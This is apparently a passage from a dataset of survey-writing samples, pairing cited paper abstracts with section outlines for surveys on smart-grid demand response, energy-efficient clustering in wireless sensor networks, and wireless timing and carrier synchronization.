the CMA-ES, a stochastic non-convex optimization method We experimentally analyze the load forecast behavior on real power consumption data The proposed method is easily parallelizable, and therefore well appropriate for large-scale scenarios in smart grids. --- paper_title: Creating an ambient-intelligence environment using embedded agents paper_content: The Essex intelligent dormitory, iDorm, uses embedded agents to create an ambient-intelligence environment. In a five-and-a-half-day experiment, a user occupied the iDorm, testing its ability to learn user behavior and adapt to user needs. The embedded agent discreetly controls the iDorm according to user preferences. Our work focuses on developing learning and adaptation techniques for embedded agents. We seek to provide online, lifelong, personalized learning of anticipatory adaptive control to realize the ambient-intelligence vision in ubiquitous-computing environments. We developed the Essex intelligent dormitory, or iDorm, as a test bed for this work and an exemplar of this approach. ---
Title: A Survey on Demand Response Programs in Smart Grids: Pricing Methods and Optimization Algorithms Section 1: Introduction Description 1: Write an introduction to the paper, explaining the concept of Demand Side Management and its advantages. Also, introduce the scope and structure of the survey. Section 2: Main Objectives of DR Description 2: Summarize the main objectives of applying a DR scheme, including the reduction of total power consumption, total needed power generation, and changing demand to follow the available supply. Section 3: DR Management Description 3: Describe the implementation of DR methods, focusing on the control of customer power consumption behavior and the cooperation of main participants in a DR program. Section 4: DR Applicability Description 4: Discuss the applicability of DR programs to different types of consumers, such as residential, commercial, and industrial sectors. Section 5: DR Communication Requirements Description 5: Detail the communication infrastructure requirements for the effective and reliable operation of DR programs in smart grids. Section 6: Adversative Conditions in DR Implementation Description 6: Outline potential issues and adverse conditions that can affect the success of DR programs, such as Cold Load PickUp and voltage violations. Section 7: Classification of DR Models Description 7: Classify DR schemes from the literature based on control mechanisms, motivations offered to consumers, and decision variables. Include detailed subsections on each classification. Section 8: Optimization Methods in DR Programs Description 8: Review work on optimization methods proposed for DR programs, categorized by the target of the optimization procedure, such as minimization of electricity cost, maximization of social welfare, and minimization of aggregated power consumption. Section 9: Application of Game Theory to DR Programs Description 9: Discuss the application of game-theoretic methods to DR programs for optimal decision-making and resource management. Section 10: Conclusion: Lessons Learned and Future Directions Description 10: Summarize key lessons learned from existing DR programs and identify future research directions to improve efficiency, scalability, and reliability in smart grid environments.
A Review on Energy Efficient of Clustering-based Routing Protocol in Wireless Sensor Network
13
--- paper_title: Improvement on LEACH Protocol of Wireless Sensor Network (VLEACH) paper_content: This paper presents a new version of LEACH protocol called VLEACH which aims to reduce energy consumption within the wireless network. We evaluate both LEACH and V-LEACH through extensive simulations using OMNET++ simulator which shows that VLEACH performs better than LEACH protocol. --- paper_title: P-EECHS: Parametric Energy Efficient Cluster Head Selection protocol for Wireless Sensor Network paper_content: This paper presents a Parametric Energy Efficient Cluster Head Selection (P-EECHS) protocol which improves LEACH protocol and aims to reduce energy consumption within the wireless sensor network. This paper improves LEACH protocol by improving the election strategy of the cluster-head nodes based on remaining energy of sensor nodes, distance from base station and the number of consecutive rounds in which a node has not been a cluster head. Also it considers the parameter that whether the nodes remaining energy is sufficient enough to send the aggregate data to the base station or not. If the nodes remaining energy is not sufficient enough it cannot be selected as cluster head. Considering these parameters, simulation results shows that the proposed protocol could better reduce energy consumption and prolong lifetime of the wireless sensor network with respect to the parameters FND (First Node Dies), HND (Half Node Dies) and LND (Last Node Dies) comparative to LEACH and EECHS. --- paper_title: Improvement on LEACH Protocol of Wireless Sensor Network (VLEACH) paper_content: This paper presents a new version of LEACH protocol called VLEACH which aims to reduce energy consumption within the wireless network. We evaluate both LEACH and V-LEACH through extensive simulations using OMNET++ simulator which shows that VLEACH performs better than LEACH protocol. --- paper_title: Energy-aware routing in cluster-based sensor networks paper_content: There has been a growing interest in the applications of sensor networks. Since sensors are generally constrained in on-board energy supply, efficient management of the network is crucial in extending the life of the sensor. We present a novel approach for energy-aware and context-aware routing of sensor data. The approach calls for network clustering and assigns a less-energy-constrained gateway node that acts as a centralized network manager. Based on energy usage at every sensor node and changes in the mission and the environment, the gateway sets routes for sensor data, monitors latency throughout the cluster, and arbitrates medium access among sensors. Simulation results demonstrate that our approach can achieve substantial energy saving. --- paper_title: Inter-cluster route algorithm based on the gateway for wireless sensor networks paper_content: As an active branch of routing technology, Cluster-based rounting protocols have a number of advantages such as topology management with convenient, energy efficient, etc. In this paper, it advanced a new inter-cluster routing algorithm (IRCG) based on gateway. Consider the node transmitting power can not adjustable, the Routing algorithm uses a single hop to intra-cluster comunication, and for inter-cluster communication, it takes multi-hop way to communicate with the sink node through the cluster head and the gateway points elected to build the reverse aggregation tree. Simulation results show that the protocol achieves better results in enhancing system lifetime than LEACH. ---
Title: A Review on Energy Efficient of Clustering-based Routing Protocol in Wireless Sensor Network Section 1: INTRODUCTION Description 1: Introduce the concept of Wireless Sensor Networks (WSNs), their components, and their applications. Emphasize the importance of energy efficiency in enhancing the quality of service. Section 2: ISSUES IN WSN Description 2: Discuss the major issues in Wireless Sensor Networks, starting with the Low-Energy Adaptive Clustering Hierarchy (LEACH) protocol and its significance in power saving. Section 3: Clusters Formation in LEACH Description 3: Describe the process of cluster formation in LEACH protocol, including the setup phase and steady-state operation phase, along with the calculation of the threshold probability. Section 4: Energy Performance of clustering-based routing protocol Description 4: Analyze the energy performance of LEACH compared to direct transmission, the effect of the number of clusters on LEACH energy performance, and various enhancements to LEACH that mitigate its disadvantages. Section 5: E-LEACH protocol Description 5: Explain the improvements in the Energy-LEACH protocol, focusing on the CH selection procedure and how nodes with higher residual energy become CHs. Section 6: LEACH-C Description 6: Discuss the centralized clustering algorithm used in LEACH-C, its setup phase, and how it improves performance by dispersing cluster heads throughout the network. Section 7: V-LEACH Description 7: Describe the V-LEACH protocol, which includes a vice-CH that replaces the CH when it dies, thus prolonging the network lifetime. Section 8: EFFICIENT-ROUTING LEACH (ER-LEACH) Description 8: Outline the Efficient Routing LEACH protocol, which enhances CH selection, reduces overhead of dynamic clusters, and balances load through the zone routing protocol. Section 9: LEACH - SPARE MANAGEMENT (LEACH-SM) Description 9: Illustrate the LEACH-SM protocol, which includes an efficient management of spares to extend the lifetime of the WSN by adding a spare selection phase. Section 10: CLUSTER HEAD SELECTION Description 10: Summarize the steps involved in cluster head selection, including network information generation, connectivity requirements, and positioning of cluster heads. Section 11: ELECTION OF GATEWAY NODE Description 11: Describe the method for selecting gateway nodes based on received messages from cluster heads and how these nodes facilitate inter-cluster communication. Section 12: Construction of Routing Gathering Tree Description 12: Explain the construction of a routing gathering tree for efficient data communication, detailing the initialization process and the roles of cluster heads and gateway nodes. Section 13: CONCLUSION Description 13: Summarize the key points discussed in the paper, including the impact of base station location, message size, and the proposed clustering routing algorithm to enhance network connectivity and reduce communication overhead.
Timing and Carrier Synchronization in Wireless Communication Systems: A Survey and Classification of Research in the Last Five Years
8
--- paper_title: Channel Estimation for OFDM paper_content: Orthogonal frequency division multiplexing (OFDM) has been widely adopted in modern wireless communication systems due to its robustness against the frequency selectivity of wireless channels. For coherent detection, channel estimation is essential for receiver design. Channel estimation is also necessary for diversity combining or interference suppression where there are multiple receive antennas. In this paper, we will present a survey on channel estimation for OFDM. This survey will first review traditional channel estimation approaches based on channel frequency response (CFR). Parametric model (PM)-based channel estimation, which is particularly suitable for sparse channels, will be also investigated in this survey. Following the success of turbo codes and low-density parity check (LDPC) codes, iterative processing has been widely adopted in the design of receivers, and iterative channel estimation has received a lot of attention since that time. Iterative channel estimation will be emphasized in this survey as the emerging iterative receiver improves system performance significantly. The combination of multiple-input multiple-output (MIMO) and OFDM has been widely accepted in modern communication systems, and channel estimation in MIMO-OFDM systems will also be addressed in this survey. Open issues and future work are discussed at the end of this paper. --- paper_title: Dirty RF: a new paradigm paper_content: The implementation challenge for new low-cost low-power wireless modem transceivers has continuously been growing with increased modem performance, bandwidth, and carrier frequency. Up to now we have been designing transceivers in a way that we are able to keep the analog (RF) problem domain widely separated from the digital signal processing design. However, with today’s deep sub-micron technology, analog impairments – “dirt effects” – are reaching a new problem level which requires a paradigm shift in the design of transceivers. Examples of these impairments are phase noise, non-linearities, I/Q imbalance, ADC impairments, etc. In the world of “Dirty RF” we assume to design digital signal processing such that we can cope with a new level of impairments, allowing lee-way in the requirements set on future RF sub-systems. This paper gives an overview of the topic and presents analytical evaluations of the performance losses due to RF impairments as well as algorithms that allow to live with imperfect RF by compensating the resulting error effects using digital baseband processing. --- paper_title: Synchronization Techniques for Orthogonal Frequency Division Multiple Access (OFDMA): A Tutorial Review paper_content: Orthogonal frequency division multiple access (OFDMA) has recently attracted vast research attention from both academia and industry and has become part of new emerging standards for broadband wireless access. Even though the OFDMA concept is simple in its basic principle, the design of a practical OFDMA system is far from being a trivial task. Synchronization represents one of the most challenging issues and plays a major role in the physical layer design. The goal of this paper is to provide a comprehensive survey of the latest results in the field of synchronization for OFDMA systems, with tutorial objectives foremost. After quantifying the effects of synchronization errors on the system performance, we review some common methods to achieve timing and frequency alignment in a downlink transmission. We then consider the uplink case, where synchronization is made particularly difficult by the fact that each user's signal is characterized by different timing and frequency errors, and the base station has thus to estimate a relatively large number of unknown parameters. A second difficulty is related to how the estimated parameters must be employed to correct the uplink timing and frequency errors. The paper concludes with a comparison of the reviewed synchronization schemes in an OFDMA scenario inspired by the IEEE 802.16 standard for wireless metropolitan area networks. --- paper_title: Fundamentals of Large Sensor Networks: Connectivity, Capacity, Clocks and Computation paper_content: Sensor networks potentially feature large numb- ers of nodes. The nodes can monitor and sense their environ- ment over time, communicate with each other over a wireless network, and process information that they exchange with each other. They differ from data networks in that the network as a whole may be designed for a specific application. We study the theoreticalfoundationsofsuchlarge-scalesensornetworks.We address four fundamental organizational and operational issues related to large sensor networks: connectivity, capacity, clocks, and function computation. To begin with, a sensor network must be connected so that information can indeed be exchanged between nodes. The connectivity graph of an ad hoc network is modeledas arandomgraphandthe criticalrangefor asymptotic connectivity is determined, as well as the critical number of neighbors that a node needs to connect to. Next, given connectivity, we address the issue of how much data can be transported over the sensor network. We present funda- mental bounds on capacity under several models, as well as architectural implications for how wireless communication should be organized. Temporal information is important both for the applications of sensor networks as well as their operation. We present fundamental bounds on the synchroniz- ability of clocks in networks, and also present and analyze algorithms for clock synchronization. Finally, we turn to the issue of gathering relevant information, which sensor networks are designed to do. One needs to study optimal strategies for in- network aggregation of data, in order to reliably compute a composite function of sensor measurements, as well as the complexity of doing so. We address the issue of how such computation can be performed efficiently in a sensor network and the algorithms for doing so, for some classes of functions. --- paper_title: What Will 5G Be? paper_content: What will 5G be? What it will not be is an incremental advance on 4G. The previous four generations of cellular technology have each been a major paradigm shift that has broken backward compatibility. Indeed, 5G will need to be a paradigm shift that includes very high carrier frequencies with massive bandwidths, extreme base station and device densities, and unprecedented numbers of antennas. However, unlike the previous four generations, it will also be highly integrative: tying any new 5G air interface and spectrum together with LTE and WiFi to provide universal high-rate coverage and a seamless user experience. To support this, the core network will also have to reach unprecedented levels of flexibility and intelligence, spectrum regulation will need to be rethought and improved, and energy and cost efficiencies will become even more critical considerations. This paper discusses all of these topics, identifying key challenges for future research and preliminary 5G standardization activities, while providing a comprehensive overview of the current literature, and in particular of the papers appearing in this special issue. --- paper_title: Multi-Cell MIMO Cooperative Networks: A New Look at Interference paper_content: This paper presents an overview of the theory and currently known techniques for multi-cell MIMO (multiple input multiple output) cooperation in wireless networks. In dense networks where interference emerges as the key capacity-limiting factor, multi-cell cooperation can dramatically improve the system performance. Remarkably, such techniques literally exploit inter-cell interference by allowing the user data to be jointly processed by several interfering base stations, thus mimicking the benefits of a large virtual MIMO array. Multi-cell MIMO cooperation concepts are examined from different perspectives, including an examination of the fundamental information-theoretic limits, a review of the coding and signal processing algorithmic developments, and, going beyond that, consideration of very practical issues related to scalability and system-level integration. A few promising and quite fundamental research avenues are also suggested. --- paper_title: Digital Communication Receivers: Synchronization, Channel Estimation, and Signal Processing: Digital E-BK paper_content: From the Publisher: ::: Digital Communication Receivers offers a complete treatment on the theoretical and practical aspects of synchronization and channel estimation from the standpoint of digital signal processing. The focus on these increasingly important topics, the systematic approach to algorithm development, and the linked algorithm-architecture methodology in digital receiver design are unique features of this book. The material is structured according to different classes of transmission channels. In Part C, baseband transmission over wire or optical fiber is addressed. Part D covers passband transmission over satellite or terrestrial wireless channels. Part E deals with transmission over fading channels. Designed for the practicing communication engineer and the graduate student, the book places considerable emphasis on helpful examples, summaries, illustrations, and bibliographies. Contents include basic material, baseband communications, passband transmission, receiver structure for PAM signals, synthesis of synchronization algorithms, performance analysis of synchronizers, bit error degradation caused by random tracking errors, frequency estimation, timing adjustment by interpolation, DSP system implementation, characterization, modeling, and simulation of linear fading channels, detection and parameter synchronization on fading channels, receiver structures for fading channels, parameter synchronization for flat fading channels, and parameter synchronization for selective fading channels. --- paper_title: OFDM and Its Wireless Applications: A Survey paper_content: Orthogonal frequency-division multiplexing (OFDM) effectively mitigates intersymbol interference (ISI) caused by the delay spread of wireless channels. Therefore, it has been used in many wireless systems and adopted by various standards. In this paper, we present a comprehensive survey on OFDM for wireless communications. We address basic OFDM and related modulations, as well as techniques to improve the performance of OFDM for wireless communications, including channel estimation and signal detection, time- and frequency-offset estimation and correction, peak-to-average power ratio reduction, and multiple-input-multiple-output (MIMO) techniques. We also describe the applications of OFDM in current systems and standards. --- paper_title: Wireless Visions: A Look to the Future by the Fellows of the WWRF paper_content: In less than two decades, mobile communication has developed from a niche application to a mass-market high-tech product, having experienced an unprecedented growth, never achieved by any other technology, whether radio, television, or even the Internet. Thirteen well-known experts, all of them honored as WWRF Fellows, have been interviewed and shared their expertise and opinions on ten questions about the wireless future, as presented here. The answers span a wide field from air interfaces, networks, devices, applications, to new ways of interaction, to name a few. Although the ideas and views presented here are not one common vision, they should provide stimulating ideas and questions for future research, and it will be exciting to see how things are really going to develop. The Fellows' ideas also clearly show the fascination, impact, and opportunities wireless communications has and will have in the future. --- paper_title: Emergent Slot Synchronization in Wireless Networks paper_content: This paper presents a biologically inspired approach for distributed slot synchronization in wireless networks. This is facilitated by modifying and extending a synchronization model based on the theory of pulse-coupled oscillators. The proposed Meshed Emergent Firefly Synchronization (MEMFIS) multiplexes synchronization words with data packets and adapts local clocks upon the reception of synchronization words from neighboring nodes. In this way, a dedicated synchronization phase is mitigated, as a network-wide slot structure emerges seamlessly over time as nodes exchange data packets. Simulation results demonstrate that synchronization is accomplished regardless of the arbitrary initial situation. There is no need for the selection of master nodes, as all nodes cooperate in a completely self-organized manner to achieve slot synchrony. Moreover, the algorithm is shown to scale with the number of nodes, works in meshed networks, and is robust against interference and collisions in dense networks. --- paper_title: Distributed synchronization in wireless networks paper_content: This article has explored history, recent advances, and challenges in distributed synchronization for distributed wireless systems. It is focused on synchronization schemes based on exchange of signals at the physical layer and corresponding baseband processing, wherein analysis and design can be performed using known tools from signal processing. Emphasis has also been given on the synergy between distributed synchronization and distributed estimation/detection problems. Finally, we have touched upon synchronization of nonperiodic (chaotic) signals. Overall, we hope to have conveyed the relevance of the subject and to have provided insight on the open issues and available analytical tools that could inspire further research within the signal processing community. --- paper_title: Timing and Carrier Synchronization With Channel Estimation in Multi-Relay Cooperative Networks paper_content: Multiple distributed nodes in cooperative networks generally are subject to multiple carrier frequency offsets (MCFOs) and multiple timing offsets (MTOs), which result in time varying channels and erroneous decoding. This paper seeks to develop estimation and detection algorithms that enable cooperative communications for both decode-and-forward (DF) and amplify-and-forward (AF) relaying networks in the presence of MCFOs, MTOs, and unknown channel gains. A novel transceiver structure at the relays for achieving synchronization in AF-relaying networks is proposed. New exact closed-form expressions for the Cramer-Rao lower bounds (CRLBs) for the multi-parameter estimation problem are derived. Next, two iterative algorithms based on the expectation conditional maximization (ECM) and space-alternating generalized expectation-maximization (SAGE) algorithms are proposed for jointly estimating MCFOs, MTOs, and channel gains at the destination. Though the global convergence of the proposed ECM and SAGE estimators cannot be shown analytically, numerical simulations indicate that through appropriate initialization the proposed algorithms can estimate channel and synchronization impairments in a few iterations. Finally, a maximum likelihood (ML) decoder is devised for decoding the received signal at the destination in the presence of MCFOs and MTOs. Simulation results show that through the application of the proposed estimation and decoding methods, cooperative systems result in significant performance gains even in presence of impairments. --- paper_title: Bounds and Algorithms for Multiple Frequency Offset Estimation in Cooperative Networks paper_content: The distributed nature of cooperative networks may result in multiple carrier frequency offsets (CFOs), which make the channels time varying and overshadow the diversity gains promised by collaborative communications. This paper seeks to address multiple CFO estimation using training sequences in space-division multiple access (SDMA) cooperative networks. The system model and CFO estimation problem for cases of both decode-and-forward (DF) and amplify-and-forward (AF) relaying are formulated and new closed-form expressions for the Cramer-Rao lower bound (CRLB) for both protocols are derived. The CRLBs are then applied in a novel way to formulate training sequence design guidelines and determine the effect of network protocol and topology on CFO estimation. Next, two computationally efficient iterative estimators are proposed that determine the CFOs from multiple simultaneously relaying nodes. The proposed algorithms reduce multiple CFO estimation complexity without sacrificing bandwidth and training performance. Unlike existing multiple CFO estimators, the proposed estimators are also accurate for both large and small CFO values. Numerical results show that the new methods outperform existing algorithms and reach or approach the CRLB at mid-to-high signal-to-noise ratio (SNR). When applied to system compensation, simulation results show that the proposed estimators significantly reduce average-bit-error-rate (ABER). --- paper_title: The Evolution of Cellular Backhaul Technologies: Current Issues and Future Trends paper_content: The rapid increase of the number of mobile subscribers as well as the deployment of 3G technologies are putting strain on mobile backhaul operational expenditures (OPEX) which amount to 20-40% of total mobile operator's OPEX due to their reliance on T1/E1 copper lines. For these reasons, the current backhaul systems, a term commonly used to describe connectivity between base stations and radio controllers, are increasingly integrating more cost-effective, packet switched technologies, especially Ethernet/Internet technologies. In addition, Wi-Fi and WiMAX are emerging as promising backhaul solutions and initial findings have demonstrated their feasibility. However, the notion of network migration unavoidably raises new technical challenges relevant to aspects of TDM and packet network timing synchronization, QoS, and packet efficiency. This survey aims to provide a comprehensive study of state-of-the-art circuit switched and emerging packet switched backhaul technologies based on research articles and standard documents. For packet switched backhaul, we focus on the practically important Pseudowire approaches which are used to transport TDM services over packet switched networks. We also discuss the features and research findings on the use of Wi-Fi and WiMAX technologies which illustrate their potential for rapid and cost-efficient backhaul deployment. Finally, we highlight some open issues relevant to timing synchronization in wireless mesh backhaul and femtocells deployments, which offer a rich ground for further research. --- paper_title: Relay-based deployment concepts for wireless and mobile broadband radio paper_content: In recent years, there has been an upsurge of interest in multihop-augmented infrastructure-based networks in both the industry and academia, such as the seed concept in 3GPP, mesh networks in IEEE 802.16, and converge extension of HiperLAN/2 through relays or user-cooperative diversity mesh networks. This article, a synopsis of numerous contributions to the working group 4 of the wireless world research forum and other research work, presents an overview of important topics and applications in the context of relaying. It covers different approaches to exploiting the benefits of multihop communications via relays, such as solutions for radio range extension in mobile and wireless broadband cellular networks (trading range for capacity), and solutions to combat shadowing at high radio frequencies. Furthermore, relaying is presented as a means to reduce infrastructure deployment costs. It is also shown that through the exploitation of spatial diversity, multihop relaying can enhance capacity in cellular networks. We wish to emphasize that while this article focuses on fixed relays, many of the concepts presented can also be applied to systems with moving relays. --- paper_title: Cooperative diversity in wireless networks: Efficient protocols and outage behavior paper_content: We develop and analyze low-complexity cooperative diversity protocols that combat fading induced by multipath propagation in wireless networks. The underlying techniques exploit space diversity available through cooperating terminals' relaying signals for one another. We outline several strategies employed by the cooperating radios, including fixed relaying schemes such as amplify-and-forward and decode-and-forward, selection relaying schemes that adapt based upon channel measurements between the cooperating terminals, and incremental relaying schemes that adapt based upon limited feedback from the destination terminal. We develop performance characterizations in terms of outage events and associated outage probabilities, which measure robustness of the transmissions to fading, focusing on the high signal-to-noise ratio (SNR) regime. Except for fixed decode-and-forward, all of our cooperative diversity protocols are efficient in the sense that they achieve full diversity (i.e., second-order diversity in the case of two terminals), and, moreover, are close to optimum (within 1.5 dB) in certain regimes. Thus, using distributed antennas, we can provide the powerful benefits of space diversity without need for physical arrays, though at a loss of spectral efficiency due to half-duplex operation and possibly at the cost of additional receive hardware. Applicable to any wireless setting, including cellular or ad hoc networks-wherever space constraints preclude the use of physical arrays-the performance characterizations reveal that large power or energy savings result from the use of these protocols. --- paper_title: Synchronization Protocols and Implementation Issues in Wireless Sensor Networks: A Review paper_content: Time synchronization in wireless sensor networks (WSNs) is a topic that has been attracting the research community in the last decade. Most performance evaluations of the proposed solutions have been limited to theoretical analysis and simulation. They consequently ignored several practical aspects, e.g., packet handling jitters, clock drifting, packet loss, and mote limitations, which affect real implementation on sensor motes. Authors of some pragmatic solutions followed empirical approaches for the evaluation, where the proposed solutions have been implemented on real motes and evaluated in testbed experiments. This paper gives an insight on issues related to the implementation of synchronization protocols in WSN. The challenges related to WSN environment are presented; the importance of real implementation and testbed evaluation are motivated by some experiments we conducted. The most relevant implementations of the literature are then reviewed, discussed, and qualitatively compared. While there are several survey papers that present and compare the protocols from the conception perspectives, as well as others that deal with mathematical and signal processing issues of the estimators, a survey on practical aspects related to the implementation is missing. To our knowledge, this paper is the first one that takes into account the practical aspect of existing solutions. --- paper_title: Fractionally Spaced Frequency-Domain MMSE Receiver for OFDM Systems paper_content: Based on frequency-domain oversampling and the Bayesian Gauss-Markov theorem, we propose a fractionally spaced frequency-domain minimum mean-square error (FSFDMMSE) receiver for orthogonal frequency-division multiplexing systems. It is shown that frequency diversity inherent in a frequency-selective fading channel can be extracted and exploited by the proposed FSFD-MMSE receiver. This diversity advantage outweighs the effect of intercarrier interference generated by frequency-domain oversampling, due largely to the MMSE receiver's interference suppression capability. Numerical results show that the FSFD-MMSE receiver outperforms the conventional MMSE receiver under both ideal and practical situations (i.e., with frequency offset, channel estimation errors, and even doubly selective channel fading). In addition, the FSFD-MMSE receiver only needs a fast Fourier transform size that is no larger than N + Q -1 (TV = number of data subcarriers, and Q = number of resolvable multipath components). --- paper_title: Reconfigurable architecture of a hybrid synchronisation algorithm for LTE paper_content: Time and frequency synchronisation are significant parts of the cell-search procedure and one of the first processing blocks within a mobile communication system. Particularly for an OFDM transmission within an initial synchronisation process, the algorithm has to deal with carrier frequency offsets up to several subcarrier spacings. To be able to still operate under those conditions, the cell-search procedure consists of different processing steps, combined in a hybrid algorithm. Beside good performance properties, hybrid algorithms lead to a high computational demand and implementation effort. To overcome these challenges, flexible architectures, which are able to select the most suitable algorithm during runtime, are the base for an efficient hardware realization. In this paper, as an example, we are introducing an hybrid initial synchronisation algorithm for an LTE-system, which still operates under the effect of a carrier frequency offset greater than the subcarrier spacing. Consecutively, we are showing a reconfigurable architecture as well as the results of an FPGA implementation of the time synchronisation part of that algorithm. The architecture is able to switch between different correlators, namely a reverse-auto, a cross- and a CP-based auto-correlation during runtime, which enables a flexible and low complexity realization of the computational complex synchronisation process. --- paper_title: Joint Channel and Frequency Offset Estimation for Oversampled Perfect Reconstruction Filter Bank Transceivers paper_content: Recently, DFT-based oversampled perfect reconstruction filter banks (OPRFB), as a special form of filtered multitone, have shown great promises for applications to multicarrier modulation. Still, accurate frequency synchronization and channel equalization are needed for their reliable operation in practical scenarios. In this paper, we first derive a data-aided joint maximum likelihood (ML) estimator of the carrier frequency offset (CFO) and the channel impulse response (CIR) for OPRFB transceiver systems operating over frequency selective fading channels. Then, by exploiting the structural and spectral properties of these systems, we are able to considerably reduce the complexity of the proposed estimator through simplifications of the underlying likelihood function. The Cramer Rao bound on the variance of unbiased CFO and CIR estimators is also derived. The performance of the proposed ML estimator is investigated by means of numerical simulations under realistic conditions with CFO and frequency selective fading channels. The effects of different pilot schemes on the estimation performance for applications over time-invariant and mobile time-varying channels are also examined. The results show that the proposed joint ML estimator exhibits an excellent performance, where it can accurately estimate the unknown CFO and CIR parameters for the various experimental setups under consideration. --- paper_title: Localized or Interleaved? A Tradeoff between Diversity and CFO Interference in Multipath Channels paper_content: Carrier frequency offset (CFO) damages the orthogonality between sub-carriers and thus causes multiuser interference in uplink OFDMA/SC-FDMA systems. For a given CFO, such multiuser interference is mainly dictated by channel (sub-carrier) allocation, which also specifies the diversity gain of one user over multi-path channels. In particular, the positions of one user's sub-channels will determine its diversity gain, while the distances between sub-channels of the concerned user and those of others will govern the CFO interference. Two popular channel allocation methods are the localized and interleaved (distributed) schemes where the former has less CFO interference but the latter achieves more diversity gain. In this paper, we will consider the channel allocation scheme for uplink LTE systems by investigating the effects of channel allocation on both of the diversity gain and CFO interference. By combining these two effects, we will propose a semi-interleaved scheme, which achieves full diversity gain with minimum CFO interference. --- paper_title: Efficient OFDM Symbol Timing Estimator Using Power Difference Measurements paper_content: This paper presents an efficient blind symbol timing estimation scheme for orthogonal frequency-division multiplexing (OFDM) systems with constant modulus constellation. The proposed technique is designed to estimate symbol timing offsets by minimizing the power difference between subcarriers with similar indices over two consecutive OFDM symbols based on the assumption that the channel slowly changes over time. The proposed power difference estimator (PDE) is totally blind because it requires no prior information about the channel or the transmitted data. Monte Carlo simulation is used to assess the PDE performance in terms of the probability of correct timing estimate Plock-in. Moreover, we propose a new performance metric denoted as the deviation from safe region (DSR). Simulation results have demonstrated that the PDE performs well in severe frequency-selective fading channels and outperforms the other considered estimators. The complexity of the PDE can be significantly reduced by incorporating a low-cost estimator to provide initial coarse timing information. The proposed PDE is realized using feedforward and early-late gate (ELG) configurations. The new PDE-ELG does not suffer from the self-noise problem inherent in other ELG estimators reported in the literature. --- paper_title: Pilot Subset Partitioning Based Integer Frequency Offset Estimation for OFDM Systems With Cyclic Delay Diversity paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for coded OFDM systems with multiple transmit antennas. However, high frequency selectivity caused by CDD degrades the performance of post- FFT estimation, i.e., integer frequency offset (IFO). This paper suggests a simple way of improving the performance of the IFO estimator based on the pilot subset partitioning which is designed to reduce the effect of frequency selective fading by adopting the CDD. By partitioning uncorrelated pilot subcarriers into subsets to satisfy high correlation, and performing frequency estimation for each pilot subset, a robust IFO estimation scheme is derived. The simulation results show that the proposed method can provide benefit to the overall system performance . --- paper_title: MCMOE-Based CFO Estimator Aided With the Correlation Matrix Approach for Alamouti's STBC MC-CDMA Downlink Systems paper_content: This paper addresses the estimation problem of carrier frequency offset (CFO) in the downlink transmission of space-time block-coded multicarrier code-division multiple-access (STBC MC-CDMA) systems over multipath fading. This study proposes a multiply constrained minimum output energy (MCMOE)-based blind CFO estimator, which is simply assisted by the presented correlation matrix approach to efficiently achieve the CFO estimate. We formulate a two-level CFO estimator by optimizing the receiver output power, as well as the data correlation matrix. At the first level, all possible CFO candidates are found by evaluating the well-defined estimated merit figure. Then, exploiting multiple constraints in the design of the MCMOE receiver, a criterion is used in level two to determine the exact CFO estimate. Numerical results are presented to verify that both precise CFO estimation and reliable error performance can be achieved, even when the channel is dominated by noise because the impact of CFO on the output signal-to-interference-plus-noise ratio (SINR) and bit error rate (BER) are effectively removed by the proposed CFO estimator. --- paper_title: A practical equalizer for cooperative delay diversity with multiple carrier frequency Offsets paper_content: Cooperative transmission in wireless networks provides diversity gain in multipath fading environments. Among all the proposed cooperative transmission schemes, delay diversity has the advantage of needing less coordination and higher spectrum efficiency. However, in a distributed network, the asynchrony comes from both carrier frequency and symbol timing between the cooperating relays. In this paper, a minimum mean square error fractionally spaced decision feedback equalizer (MMSE-FS-DFE) is developed to extract the diversity with large multiple carrier frequency offsets, its performance approaches the case without multiple carrier frequency offsets. The front end design for the receiver in this scenario is discussed, and a practical frame structure is designed for carrier frequency offsets and channel estimation. A subblock-wise decision-directed adaptive least squares (LS) estimation method is developed to solve the problem caused by error in frequency offset estimation. The purpose of this paper is to provide a practical design for cooperative transmission (CT) with the delay diversity scheme. --- paper_title: Estimation scheme of the receiver IQ imbalance under carrier frequency offset in communication system paper_content: IQ signal processing is widely utilised in today's communication systems. However, it usually faces a common problem of front-end distortion such as IQ imbalance and carrier frequency offset (CFO). Effective algorithms exist for estimating and compensating for IQ imbalance as well as CFO, when the two problems are treated separately. With both effects present, most of those algorithms suffer from degraded quality parameter estimates. In this study, the authors proposed a scheme to estimate and compensate for IQ imbalance in the presence of CFO by using a known preamble of a repeated training sequence. In addition, the authors present a modified algorithm to suit the particular case when CFO is small. The performance of our proposed scheme has been examined with computer simulations on IEEE 802.11a signals. It is shown that the proposed method is more robust and renders better performance than the existing method. --- paper_title: Performance study of fast frequency-hopped/M-ary frequency-shift keying systems with timing and frequency offsets over Rician-fading channels with both multitone jamming and partial-band noise jamming paper_content: In this study, the effects of timing and frequency offsets on bit-error rate (BER) performance of fast frequency-hopped M-ary frequency-shift keying communication systems over Rician-fading channels with both multitone jamming (MTJ) and partial-band noise jamming (PBNJ) are investigated. Analytical BER expressions are derived for both linear-combining and product-combining receivers. Numerical results show that under both MTJ and PBNJ conditions, the BER performance falls between the two extreme cases, in which either MTJ or PBNJ presents. It is found that the BER performance is severely degraded as the timing or frequency offset increases. The product-combining receiver is found to be more sensitive to the timing and frequency offsets than the linear-combining receiver. It is also observed that for the linear-combining receiver, the optimum diversity order increases as the timing and frequency offset increases over both Rician-fading and Rayleigh-fading channels; however, the reverse is true for the product-combining receiver. --- paper_title: A Low-Power Low-Cost Design of Primary Synchronization Signal Detection paper_content: Synchronization is an important component of a practical communication system. Furthermore, network entry including synchronization is important. Since the detection of primary synchronization signal (PSS) is the first step of network entry in long term evolution (LTE) systems, thus it may be a critical path for practical systems. Therefore, tradeoff between performance and low power consumption and low cost of PSS detection needs to be made carefully. This paper presents a new synchronization method for low power and low cost design. The approach of a 1-bit analog-to-digital converter (ADC) with down-sampling is compared with that of a 10-bit ADC without down-sampling under multi-path fading conditions defined in LTE standard for user equipment (UE) performance test . The simulation results of PSS are obtained on several kinds of channels. The simulation results explicitly show that the performance of the method with down-sampling for 1-bit ADC does not degrade even if frequency offset exists. Based on the simulation results, different implementation architectures and their synthesis report and analysis are present. A low-power low-cost design with high performance to detect PSS is derived in this paper. --- paper_title: Improved Detection of Uplink OFDM-IDMA Signals with Carrier Frequency Offsets paper_content: This letter proposes an improved detection scheme to mitigate the influence of carrier frequency offsets (CFOs) in uplink orthogonal frequency division multiplexing-interleave division multiple access (OFDM-IDMA) systems. The basic principle is to iteratively estimate and cancel the combined interference from multiple users and 